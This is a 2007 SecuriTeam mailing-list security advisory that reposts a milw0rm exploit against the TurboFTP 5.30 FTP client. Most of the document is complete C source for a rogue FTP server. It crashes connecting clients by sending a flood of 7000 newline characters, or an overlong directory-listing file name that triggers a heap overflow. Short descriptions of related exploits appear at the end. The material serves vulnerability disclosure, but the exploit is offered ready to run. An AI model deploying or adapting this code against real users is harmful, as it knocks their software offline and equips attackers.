[EXPL] TurboFTP Multiple DoS (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 21 Feb 2007 11:32:45 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
TurboFTP Multiple DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://www.turboftp.com/> TurboFTP is "a secure FTP client program
(supports FTP over SSL/TLS and SFTP over SSH2) for Windows
9x/ME/NT4/2000/XP/2003". Multiple vulnerabilities in TurboFTP allows
remote attackers to cause the FTP client to crash.
DETAILS
Exploit:
/****************************************
* TurboFTP 5.30 Build 572 Multiple Remote DoS
*
*
*
* Several vulnerabilities have been discovered in TurboFTP
*
* 1) The app does not correctly handle reponses that contains 7000 newline
chars *
* 2) there's a heap overflow triggered by a long file name in a response
to a LIST *
* command
*
* 3) There is a heap overflow when the app sends a long CWD command
*
*
*
* Usage: TurboFTPDoS mode, mode is 1 or 2
*
*
*
* Only a DoS, I dont think code execution is possible
*
*
*
* Have Fun!
*
*
*
* Coded by Marsu <Marsupilamipowa@xxxxxxxxxx>
*
*****************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[30000];
sockaddr_in sin;
int server,client;
int mode;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
bind(server,(SOCKADDR*)&sin,sizeof(sin));
printf("[+] TurboFTP 5.30 Build 572 Multiple Remote DoS\n");
printf("[+] Coded and discovered by Marsu
<Marsupilamipowa@xxxxxxxxxx>\n");
if (argc<2)
{
printf("[+] Usage: %s mode, mode is 1 or 2\n",argv[0]);
return 0;
}
mode = atoi(argv[1]);
printf("[*] Listening on port 21 ...\n");
listen(server,5);
printf("[*] Waiting for client ...\n");
client=accept(server,NULL,NULL);
printf("[+] Client connected\n");
memset(recvbuff,'\0',1024);
if (mode==1) {
memset(evilbuff,10,7000);
memcpy(evilbuff,"220 Hello there",15);
memcpy(evilbuff+7000,"\r\n\0",3);
}
else
memcpy(evilbuff,"220 Hello there\r\n\0",18);
if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!\n");
exit(-1);
}
//USER
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
if (mode==1) {
memset(evilbuff,10,7000);
memcpy(evilbuff,"331 ",4);
memcpy(evilbuff+7000,"\r\n\0",3);
}
else
memcpy(evilbuff,"331 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);
if (mode==1) {
printf("[+] Waiting for a few seconds ...\n");
Sleep(4000);
printf("[+] Must be 100%% CPU consuming\n");
return 0;
}
//PASS
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"230 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);
//SYST
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"215 WINDOWS\r\n\0",14);
send(client,evilbuff,strlen(evilbuff),0);
//FEAT
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"211 END\r\n\0",10);
send(client,evilbuff,strlen(evilbuff),0);
//REST 100
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"350 rest at 100\r\n\0",10);
send(client,evilbuff,strlen(evilbuff),0);
//REST 0
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"350 rest at 0\r\n\0",10);
send(client,evilbuff,strlen(evilbuff),0);
//PWD
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"257 \"dir/\"\r\n\0",13);
send(client,evilbuff,strlen(evilbuff),0);
//TYPE A
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"200 \r\n\0",10);
send(client,evilbuff,strlen(evilbuff),0);
//PASV
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"227 Entering Passive Mode (127,0,0,1,40,0)\r\n\0", 45);
//127.0.0.1:10200
send(client,evilbuff,strlen(evilbuff),0);
int ListenSock= socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in sin2;
sin2.sin_family = AF_INET;
sin2.sin_addr.s_addr = htonl(INADDR_ANY);
sin2.sin_port = htons( 10240 );
bind(ListenSock,(SOCKADDR*)&sin2,sizeof(sin2));
printf("[*] Waiting for data connection ...\n");
listen(ListenSock,5);
int DATAClient=accept(ListenSock,NULL,NULL);
printf("[+] Client connected\n");
//LIST
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
int len=700;
memset(evilbuff,'A',len);
memcpy(evilbuff,"-rw-rw-rw- 1 ftp ftp 1777 Jan 30 12:14
T",58);
memcpy(evilbuff+len,"\r\n\0",3);
send(DATAClient,evilbuff,strlen(evilbuff),0);
//Close control connection
memcpy(evilbuff,"150 Opening data connection for directory
list.\r\n\0",60);
send(client,evilbuff,strlen(evilbuff),0);
memcpy(evilbuff,"226 OK\r\n",9);
send(client,evilbuff,strlen(evilbuff),0);
closesocket(DATAClient);
printf("[+] Evil list sent\n");
closesocket(client);
closesocket(server); //bug is triggered there
printf("[+] TurboFTP is out\n");
return 0;
}
// milw0rm.com [2007-02-20]
ADDITIONAL INFORMATION
The information has been provided by <mailto:Marsupilamipowa@xxxxxxxxxx>
Marsu.
The original article can be found at:
<http://www.milw0rm.com/exploits/3341>
http://www.milw0rm.com/exploits/3341
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [TOOL] ZmbScap - Zombie Scapper
- Next by Date: [EXPL] FTP Voyager CWD Stack Overflow (Exploit)
- Previous by thread: [TOOL] ZmbScap - Zombie Scapper
- Next by thread: [EXPL] FTP Voyager CWD Stack Overflow (Exploit)
- Index(es):
Relevant Pages
- [NEWS] Ventrilo Denial of Service
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper packet handling
within Ventrilo allow attackers to crash ... void ventrilo_udp_head_dec(unsigned char
*data) ... void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short ...
(Securiteam) - [EXPL] qwik-smtpd Format String
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... ** The second problem was "fixed"
using another char and then ... ** calling the int 0x80 syscall. ... void
Usage; ... (Securiteam) - [EXPL] mtFTPd Server Format String (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... / discovered by darkeagle
- xx.10.04 ... build_un(unsigned int retaddr, unsigned int offset, unsigned int base, ...
main(int argc, char * argv) ... (Securiteam) - [EXPL] Samba "send_mailslot()" Buffer Overflow Vulnerability (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... void put_name(char *dest,
const char *name, int pad, unsigned int ... (Securiteam) - [EXPL] Crystal FTP Pro Client LIST Proof of Concept
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... unsigned char reverseshell[]
= ... void auth; ... void handle_cmd (int s, int connfd, char* ip); ...
(Securiteam)
